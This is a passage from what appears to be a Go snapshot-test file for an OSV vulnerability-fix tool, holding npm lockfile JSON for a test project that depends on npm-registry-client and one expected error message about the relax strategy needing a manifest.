"sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": "^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/errors_when_relock_used_without_manifest - 1] --- [TestCommand/errors_when_relock_used_without_manifest - 2] relax strategy requires manifest file --- [TestCommand/errors_when_relock_used_without_manifest - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": 